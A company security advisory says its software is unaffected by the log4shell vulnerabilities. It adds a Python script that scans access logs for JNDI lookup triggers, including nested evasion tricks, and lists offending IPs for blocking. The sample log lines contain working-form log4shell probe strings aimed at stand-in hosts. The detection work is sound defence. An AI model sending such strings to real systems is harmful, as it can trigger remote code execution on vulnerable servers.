All EVP Systems software is unaffected by the recently announced “log4j” vulnerability, officially named CVE-2021-44228 and nicknamed “log4shell.” It is also not subject to CVE-2021-45046 or CVE-2021-45105, two associated vulnerabilities of log4j. EVP Office applications—EstateVal, GiftVal, CostBasis, and CapWatch—do not use the log4j library, and therefore require no mitigation. Most of our internal systems do not use log4j either, but we do have one that has been (repeatedly) upgraded to the latest release, and therefore poses no threat.
Details
On Friday, December 10, 2021, the Apache Foundation announced that log4j, a popular logging library for the Java programming language, had a critical remote code execution (RCE) bug. When programs that use log4j versions 2.0.0 through 2.15.0 are sent a specific series of characters, the target system can be forced to run arbitrary commands, which effectively compromises the entire system. Version 2.16.0 is still exposed to an infinite-recursion denial-of-service attack.
log4j is very popular, and used almost universally by Java programmers. Millions of systems—from banks to stock exchanges to spacecraft—rely on the library to handle the creation and maintenance of their internal logs. That such a foundational piece of shared software was compromised is extremely serious.
Mitigations
As noted, EVP Systems itself is unaffected by the “log4shell” and associated bugs. None of our EVP Office programs use log4j, nor do the vast majority of our internal systems. The one program that does use log4j is running 2.17.0, the latest release as of December 18, 202
However, EVP Systems does not exist in a vacuum, and we are in contact with all of our vendors—our cloud-hosting provider, our e-mail service, our data suppliers, among others—to ensure that their services are not compromised or affected by the bug. If we encounter any issues, we will update our clients accordingly.
We are also monitoring our logs for the specific series of characters that indicate an attempted CVE-2021-44228 / CVE-2021-45046 / CVE-2021-45105 attack. Though all such attacks will fail, we intend to block their source IP addresses to prevent those sources from making further intrusion attempts using any other known or as-yet-unknown bugs.
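The log monitoring described above is straightforward to automate. The following is an added example written for this page, not EVP Systems' own tooling: it scans web-server access-log lines for the well-known log4j lookup trigger, unwraps the common nesting tricks that attackers use to evade naive string matches, and tallies the source IP addresses that sent them so they can be fed to a blocklist. The log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample lines in combined access-log format. The IPs are from
# documentation ranges and the hostnames are made up; nothing here is a real IoC.
SAMPLE_LOG = """\
198.51.100.23 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 404 0 "-" "${jndi:ldap://scanner.invalid/a}"
203.0.113.9 - - [11/Dec/2021:03:14:10 +0000] "GET /?x=${${lower:j}ndi:dns://scanner.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"
192.0.2.77 - - [11/Dec/2021:03:15:00 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://probe.invalid/c}"
198.51.100.23 - - [11/Dec/2021:03:16:21 +0000] "GET /about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Nested lookups commonly wrapped around the trigger to hide it from simple
# substring searches: ${lower:j} and ${upper:j} evaluate to the letter, and
# ${::-j} is an empty lookup whose default value is the letter.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}]*)\}|\$\{::-([^}]*)\}", re.IGNORECASE)

# The trigger itself, once the wrappers have been collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse nested lookup wrappers until the text stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = _WRAPPER.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text


def is_log4shell_probe(line: str) -> bool:
    """True when a log line carries the lookup trigger in plain or wrapped form."""
    return _JNDI.search(normalize(line)) is not None


def suspicious_sources(log_text: str) -> Counter:
    """Count probe attempts per source IP (first field of a combined-format line)."""
    hits = Counter()
    for line in log_text.splitlines():
        if line.strip() and is_log4shell_probe(line):
            hits[line.split()[0]] += 1
    return hits


def blocklist(log_text: str) -> list:
    """Sorted list of source IPs that sent at least one probe."""
    return sorted(suspicious_sources(log_text))


if __name__ == "__main__":
    for ip, count in suspicious_sources(SAMPLE_LOG).most_common():
        print(f"{ip}\t{count} probe(s)")
```

Two caveats for anyone adapting this: matching is case-insensitive because the `upper` wrapper changes letter case without changing what log4j resolves, and the wrapper list covers only the most common evasions, so a miss means "not seen", not "not attacked". Patching, as the advisory stresses, remains the actual fix; this only identifies who is knocking.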
Questions
If you have any questions about EVP Systems' handling of log4shell / CVE-2021-44228 / CVE-2021-45046 / CVE-2021-45105, please contact our Compliance Department at compliance@evspys.com.
Also, please note that a history of our treatment of high-profile Internet vulnerabilities is always available on our website.
(This article was updated on December 16, 2021 to include information about CVE-2021-45046. It was also updated on December 20, 2021 to include information about CVE-2021-45105.)